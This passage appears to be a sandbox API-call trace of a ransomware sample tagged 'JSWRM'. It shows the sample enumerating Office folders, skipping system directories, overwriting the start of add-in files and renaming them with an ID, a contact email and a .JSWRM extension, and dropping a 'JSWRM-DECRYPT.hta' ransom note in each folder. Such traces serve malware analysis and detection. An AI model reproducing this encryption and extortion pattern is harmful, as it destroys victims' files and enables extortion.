| out: lpMultiByteStr="EUROTOOL.XLAM", lpUsedDefaultChar=0x0) returned 13 [0132.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\EUROTOOL.XLAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\eurotool.xlam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.262] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=392160) returned 1 [0132.262] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.262] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0132.274] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.274] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0132.276] CloseHandle (hObject=0x238) returned 1 [0132.276] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\EUROTOOL.XLAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\eurotool.xlam"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\EUROTOOL.XLAM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\eurotool.xlam.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.308] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x456b2b7f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x456b2b7f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x456d8d85, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0132.308] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0132.308] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0132.308] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0132.308] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0132.308] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0132.308] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0132.308] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0132.308] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0132.308] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0132.308] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0132.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0132.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0132.309] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41a796b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="SOLVER", cAlternateFileName="")) returned 1 [0132.309] lstrcmpiW (lpString1="SOLVER", lpString2=".") returned 1 [0132.309] lstrcmpiW (lpString1="SOLVER", lpString2="..") returned 1 [0132.309] lstrcmpiW (lpString1="SOLVER", lpString2="...") returned 1 [0132.309] lstrcmpiW (lpString1="SOLVER", lpString2="windows") returned -1 [0132.309] lstrcmpiW (lpString1="SOLVER", lpString2="recovery") returned 1 [0132.309] lstrcmpiW (lpString1="SOLVER", lpString2="perflogs") returned 1 [0132.309] lstrcmpiW (lpString1="SOLVER", lpString2="documents and settings") returned 1 [0132.309] lstrcmpiW (lpString1="SOLVER", lpString2="$RECYCLE.BIN") returned 1 [0132.309] lstrcmpiW (lpString1="SOLVER", lpString2="system volume information") returned -1 [0132.309] lstrcmpiW (lpString1="SOLVER", lpString2="msocache") returned 1 [0132.309] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\SOLVER\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\solver\\jswrm-decrypt.hta")) returned 0xffffffff [0132.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\SOLVER\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\solver\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.311] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.311] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0132.312] CloseHandle (hObject=0x238) returned 1 [0132.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\SOLVER\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\solver\\jswrm-decrypt.hta")) returned 0x20 [0132.312] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\SOLVER\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xafa146a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x45856577, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0132.312] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0132.312] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xafa146a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x45856577, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0132.312] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0132.312] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0132.312] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45856577, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x45856577, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x45856577, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0132.312] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0132.312] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0132.312] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0132.312] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0132.312] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0132.312] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0132.312] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0132.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0132.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0132.313] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0132.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0132.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0132.313] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xafa146a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xafa146a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb16b0a3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe8dfb, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SOLVER.XLAM", cAlternateFileName="SOLVER~1.XLA")) returned 1 [0132.313] lstrcmpiW (lpString1="SOLVER.XLAM", lpString2=".") returned 1 [0132.313] lstrcmpiW (lpString1="SOLVER.XLAM", lpString2="..") returned 1 [0132.313] lstrcmpiW (lpString1="SOLVER.XLAM", lpString2="...") returned 1 [0132.313] lstrcmpiW (lpString1="SOLVER.XLAM", lpString2="windows") returned -1 [0132.313] lstrcmpiW (lpString1="SOLVER.XLAM", lpString2="recovery") returned 1 [0132.313] lstrcmpiW (lpString1="SOLVER.XLAM", lpString2="perflogs") returned 1 [0132.313] lstrcmpiW (lpString1="SOLVER.XLAM", lpString2="documents and settings") returned 1 [0132.313] lstrcmpiW (lpString1="SOLVER.XLAM", lpString2="$RECYCLE.BIN") returned 1 [0132.313] lstrcmpiW (lpString1="SOLVER.XLAM", lpString2="system volume information") returned -1 [0132.313] lstrcmpiW (lpString1="SOLVER.XLAM", lpString2="msocache") returned 1 [0132.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLVER.XLAM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0132.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLVER.XLAM", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOLVER.XLAM", lpUsedDefaultChar=0x0) returned 11 [0132.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLVER.XLAM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0132.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLVER.XLAM", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOLVER.XLAM", lpUsedDefaultChar=0x0) returned 11 [0132.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\SOLVER\\SOLVER.XLAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\solver\\solver.xlam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.314] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=953851) returned 1 [0132.314] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.315] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0132.329] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.329] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0132.330] CloseHandle (hObject=0x314) returned 1 [0132.330] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\SOLVER\\SOLVER.XLAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\solver\\solver.xlam"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\SOLVER\\SOLVER.XLAM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\solver\\solver.xlam.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.331] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41a796b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf41cdbc1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x35438, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SOLVER32.DLL", cAlternateFileName="")) returned 1 [0132.331] lstrcmpiW (lpString1="SOLVER32.DLL", lpString2=".") returned 1 [0132.331] lstrcmpiW (lpString1="SOLVER32.DLL", lpString2="..") returned 1 [0132.331] lstrcmpiW (lpString1="SOLVER32.DLL", lpString2="...") returned 1 [0132.331] lstrcmpiW (lpString1="SOLVER32.DLL", lpString2="windows") returned -1 [0132.331] lstrcmpiW (lpString1="SOLVER32.DLL", lpString2="recovery") returned 1 [0132.331] lstrcmpiW (lpString1="SOLVER32.DLL", lpString2="perflogs") returned 1 [0132.331] lstrcmpiW (lpString1="SOLVER32.DLL", lpString2="documents and settings") returned 1 [0132.331] lstrcmpiW (lpString1="SOLVER32.DLL", lpString2="$RECYCLE.BIN") returned 1 [0132.331] lstrcmpiW (lpString1="SOLVER32.DLL", lpString2="system volume information") returned -1 [0132.331] lstrcmpiW (lpString1="SOLVER32.DLL", lpString2="msocache") returned 1 [0132.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLVER32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLVER32.DLL", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOLVER32.DLL", lpUsedDefaultChar=0x0) returned 12 [0132.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLVER32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOLVER32.DLL", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOLVER32.DLL", lpUsedDefaultChar=0x0) returned 12 [0132.331] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41a796b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf41cdbc1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x35438, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SOLVER32.DLL", cAlternateFileName="")) returned 0 [0132.331] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0132.331] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41a796b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="SOLVER", cAlternateFileName="")) returned 0 [0132.331] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0132.332] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b27715c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b27715c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="LogoImages", cAlternateFileName="LOGOIM~1")) returned 1 [0132.332] lstrcmpiW (lpString1="LogoImages", lpString2=".") returned 1 [0132.332] lstrcmpiW (lpString1="LogoImages", lpString2="..") returned 1 [0132.332] lstrcmpiW (lpString1="LogoImages", lpString2="...") returned 1 [0132.332] lstrcmpiW (lpString1="LogoImages", lpString2="windows") returned -1 [0132.332] lstrcmpiW (lpString1="LogoImages", lpString2="recovery") returned -1 [0132.332] lstrcmpiW (lpString1="LogoImages", lpString2="perflogs") returned -1 [0132.332] lstrcmpiW (lpString1="LogoImages", lpString2="documents and settings") returned 1 [0132.332] lstrcmpiW (lpString1="LogoImages", lpString2="$RECYCLE.BIN") returned 1 [0132.332] lstrcmpiW (lpString1="LogoImages", lpString2="system volume information") returned -1 [0132.332] lstrcmpiW (lpString1="LogoImages", lpString2="msocache") returned -1 [0132.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\jswrm-decrypt.hta")) returned 0xffffffff [0132.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0132.336] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.336] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0132.337] CloseHandle (hObject=0x45c) returned 1 [0132.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\jswrm-decrypt.hta")) returned 0x20 [0132.338] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b27715c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x458a2a58, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232100 [0132.339] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0132.339] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b27715c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x458a2a58, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.342] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0132.342] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0132.342] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198d5bc7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198d5bc7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198fbe19, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8cf, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogo.contrast-black_scale-100.png", cAlternateFileName="EXDF79~1.PNG")) returned 1 [0132.342] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-100.png", lpString2=".") returned 1 [0132.342] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-100.png", lpString2="..") returned 1 [0132.342] lstrcmpiW (lpString1="ExcelLogo.contrast-black_scale-100.png", lpString2="...") returned 1 